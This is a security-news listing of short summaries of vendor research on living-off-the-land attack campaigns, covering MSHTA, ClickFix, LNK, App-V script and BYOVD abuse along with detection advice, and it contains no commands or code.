All news with #living off the land tag

🛡️ Bitdefender reports that Microsoft’s MSHTA (Microsoft HTML Application Host), a remnant from Internet Explorer, is actively abused as a living-off-the-land binary in ongoing malware campaigns. Attackers use it to execute obfuscated HTA content, launch PowerShell, and fetch loaders and stealers such as CountLoader, LummaStealer, Amatera and PurpleFox. Campaigns rely on fake downloads, cracked apps, SEO-poisoned pages and Discord phishing to trick victims into executing payloads. Because MSHTA is Microsoft-signed and preinstalled, it remains implicitly trusted and attractive to adversaries.

🔐 ReliaQuest researchers describe a campaign where social-engineering ClickFix techniques were paired with the decade-old Python SOCKS5 proxy PySoxy to maintain persistent access on compromised hosts. Attackers staged the proxy after reconnaissance and used a scheduled task for re-execution, so blocking the initial ClickFix vector did not fully remove access. Analysts advise treating these incidents as active compromises and hunting for Python proxy artifacts, scheduled tasks, and staged components rather than assuming a blocked C2 equals containment.

🔍 Cisco Talos research (published 21 April) details how attackers are repurposing native macOS features to execute code, move laterally and evade detection across enterprise environments. Built-in capabilities such as Remote Application Scripting (RAS), Spotlight metadata and AppleScript can be abused to run commands, hide payloads and perform covert data transfer. The findings show gaps in visibility and recommend shifting to process-lineage analysis and tighter MDM controls to reduce exposure.

🔒 Fortinet FortiGuard Labs reports DPRK-linked actors using GitHub as command-and-control infrastructure in multi-stage LNK-based phishing attacks targeting South Korea. Obfuscated Windows shortcut files drop a decoy PDF and a silent PowerShell script that performs anti-analysis checks, extracts a VBScript, and creates persistence via a scheduled task running every 30 minutes. The script profiles hosts, exfiltrates the data to a GitHub repo under an account such as 'motoralis' with a hard-coded token, and retrieves additional modules or commands from files in the repository to maintain control.

🛡️ Fortinet reports a DPRK-linked espionage campaign leveraging weaponized Windows shortcut (.LNK) files and GitHub repositories as command-and-control channels to target South Korean organizations. The attackers rely on multi-stage PowerShell scripts, progressively embedding decoding functions and encoded payloads inside LNK arguments to evade detection. This approach reflects a living off the land strategy that abuses native Windows utilities and legitimate services.

🔒 Cisco Talos and Trend Micro say Qilin and Warlock ransomware groups have adopted a bring-your-own vulnerable driver (BYOVD) approach to disable endpoint security on compromised hosts. Talos identified a malicious DLL named msimg32.dll that side-loads a PE loader which decrypts and executes an in-memory EDR killer. The payload leverages renamed drivers such as rwdrv.sys (a repackaged ThrottleStop.sys) and hlpdrv.sys to access physical memory and terminate over 300 EDR drivers. Warlock has similarly used NSecKrnl.sys and a suite of legitimate tools to persist, move laterally, and exfiltrate data.

🔒 Threat actors are increasingly abusing HTTP cookies as a stealthy control channel for PHP webshells on Linux hosting platforms. By gating execution on specific cookie values, attackers keep loaders dormant during normal traffic and activate functionality only when exact cookie conditions are met. Variants range from multi-stage loaders that reconstruct functions at runtime to single-file interactive shells, often using base64 reconstruction and layered obfuscation to evade detection. Review Microsoft Defender guidance to detect, hunt, and mitigate these threats.

⚠️ Attackers increasingly bypass classic defenses by abusing trusted, built-in tools such as PowerShell, WMIC, and Certutil to move laterally, escalate privileges, and maintain persistence without dropping new malware. These Living Off The Land (LOTL) techniques mimic routine admin tasks and produce minimal alerts, creating stealthy blind spots for detection-focused teams. A data-driven Internal Attack Surface Assessment reveals unnecessary access, maps realistic attack paths, and prioritizes low-impact remediations so organizations can harden systems without disrupting workflows.

🔒 Ransomware in 2025 has shifted from noisy breaches to measured, identity-centric operations that mimic legitimate user activity. Attackers commonly gain initial access (about 40% via phishing) then use built-in tools like RDP, PowerShell, and PsExec to move laterally while using valid accounts. Talos highlights manufacturing and professional services as top targets and identifies Qilin as the most prolific group, frequently using double-extortion. Defenders should prioritize identity protections, continuous anomaly monitoring, accurate asset inventories, robust backups, EDR, segmentation, and regular ransomware response testing.

🔍 Exfiltration Framework examines how attackers repurpose legitimate OS utilities, third-party endpoint tools, and cloud clients to move sensitive data while evading traditional detections. The research shows that static IOCs and tool-blocking strategies are frequently ineffective when adversaries operate inside trusted software and infrastructure. By normalizing execution context, parent-child process relationships, network patterns, forensic artifacts, and destination characteristics, the framework exposes stable behavioral signals that persist despite masquerading, renaming, or relocation. It recommends correlating endpoint, network, and cloud telemetry, applying behavioral baselining, and focusing on cumulative transfer analysis rather than single-event or allow-list approaches.

🔒LeakNet has adopted the social-engineering ClickFix lure to gain initial access and now deploys a loader that leverages the legitimate Deno runtime to decode and execute JavaScript in memory. By running signed Deno binaries, operators minimize disk artifacts and evade blocklists, often initiating activity via VBS and PowerShell scripts named like Romeo*.ps1 and Juliet*.vbs. Post-compromise actions include DLL sideloading, PsExec lateral movement, credential discovery, C2 beaconing, and data exfiltration to abused Amazon S3 buckets, offering clear detection opportunities for defenders.

🔒 Researchers warn that criminals have scaled ClickFix social-engineering lures to deliver sophisticated, fileless infostealers via compromised WordPress sites. Rapid7 observed a campaign active since December 2025 that leveraged fake Cloudflare CAPTCHA prompts across more than 250 WordPress domains in 12 countries to trick victims into running obfuscated commands. The chain deploys an in-memory loader called DoubleDonut that injects payloads into legitimate Windows processes, and analysts also observed novel .NET and C++ stealers alongside a new Vidar variant. Microsoft noted a separate campaign that pivots from the Run dialog to Windows Terminal for execution.

⚠ Wietze Beukema disclosed four new LNK techniques that can mislead Windows users by showing harmless shortcut targets while executing different programs. He demonstrated how inconsistent fields in the LNK format — including TargetIDList, EnvironmentVariableDataBlock, LinkInfo, and paired ANSI/Unicode values — let attackers spoof visible destinations, hide command-line arguments, and run concealed binaries. These methods can enable phishing, USB-borne attacks, and stealthy initial access and rely on Windows' normal shortcut handling rather than a traditional software bug. Until mitigations or behavior changes are implemented, treat untrusted .LNK files as potentially dangerous.

📄 Forcepoint X‑Labs researchers have uncovered a Phorpiex‑backed phishing campaign that weaponizes Windows shortcut (.lnk) files to deploy Global Group ransomware. Attackers send messages with the subject "Your Document" and attachments like "Document.doc.lnk", exploiting hidden file extensions and a Word‑style icon to trick recipients. The .lnk uses built‑in utilities (cms.exe and PowerShell) and heavily obfuscated commands to fetch and run a second‑stage payload, leveraging Living‑off‑the‑Land techniques so the ransomware executes locally without external C2 communication.

🔒 A newly disclosed campaign dubbed DEAD#VAX leverages IPFS-hosted VHD lures and extreme script obfuscation to mount a virtual drive disguised as a PDF and load an encrypted AsyncRAT payload entirely in memory. Securonix researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee describe a multi-stage chain using WSF, obscured batch scripts, and self-parsing PowerShell to decrypt and inject x64 shellcode into trusted, Microsoft-signed processes. The attack avoids writing a recognizable executable to disk, establishes persistence via scheduled tasks, and throttles activity to reduce detection and forensic footprint.

🔒 Blackpoint researchers describe a campaign that chains ClickFix-style fake CAPTCHA prompts with a signed Microsoft App-V script to proxy PowerShell and deliver the Amatera information stealer. Victims are tricked into pasting a command into the Windows Run dialog that abuses SyncAppvPublishingServer.vbs to load an in-memory loader, which pulls configuration from a public Google Calendar and retrieves a PNG containing an encrypted PowerShell payload. The attack targets systems with App-V enabled (Enterprise/Education), relies on manual user interaction, and uses living-off-the-land techniques and trusted services to frustrate detection and automated analysis.

🔒 A recent campaign blends the ClickFix social-engineering method with a fake CAPTCHA and a signed Microsoft App-V script to deliver the Amatera infostealer. Attackers use the trusted SyncAppvPublishingServer.vbs executed via wscript.exe to proxy PowerShell and evade detection, then fetch configuration from a public Google Calendar. Later stages hide encrypted PowerShell payloads in PNGs via LSB steganography and execute Amatera in memory. Researchers recommend removing unused App-V components, restricting the Run dialog, enabling PowerShell logging, and monitoring outbound connection anomalies.

🔍 This contributed webinar from Zscaler Internet Access examines how today’s attacks often run “hidden in plain sight,” abusing trusted tools and developer workflows instead of delivering conventional binaries. The session covers living off the land techniques, fileless “last mile” reassembly via obfuscated HTML/JavaScript, and the risks in CI/CD and third‑party repositories. It explains how cloud‑native inspection, behavioral analysis, and zero‑trust design can restore visibility and surface relevant activity without slowing the business.

🔍 A legitimate open-source server monitoring platform, Nezha, is being abused by threat actors as a post-exploitation remote access tool. Ontinue's Cyber Defense Center found attackers silently installing the agent to gain SYSTEM/root privileges and execute remote commands, file transfers and interactive shells. Because the software is legitimate and shows zero detections on VirusTotal, signature-based defenses often fail to flag this misuse. The campaign highlights the challenge of distinguishing benign tools from adversary activity.

🔒 Cybersecurity teams disclosed linked campaigns that abuse cracked-software sites and compromised YouTube accounts to deliver modular loaders CountLoader and GachiLoader. CountLoader 3.2 is distributed via malicious ZIPs hosted on MediaFire and uses a renamed Python binary invoked through mshta.exe to establish persistence with scheduled tasks that mimic Google and fetch next-stage payloads. Check Point described GachiLoader, an obfuscated Node.js loader spread through a "YouTube Ghost Network" that deploys novel PE injection via a Kidkadi stage. Both campaigns emphasize in-memory execution, signed-binary abuse, removable-media spread, and sophisticated evasion.